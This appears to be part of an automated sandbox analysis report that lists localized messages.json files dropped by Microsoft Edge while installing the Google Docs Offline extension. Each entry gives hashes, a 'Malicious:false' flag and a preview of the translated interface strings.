                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                      Malicious:false
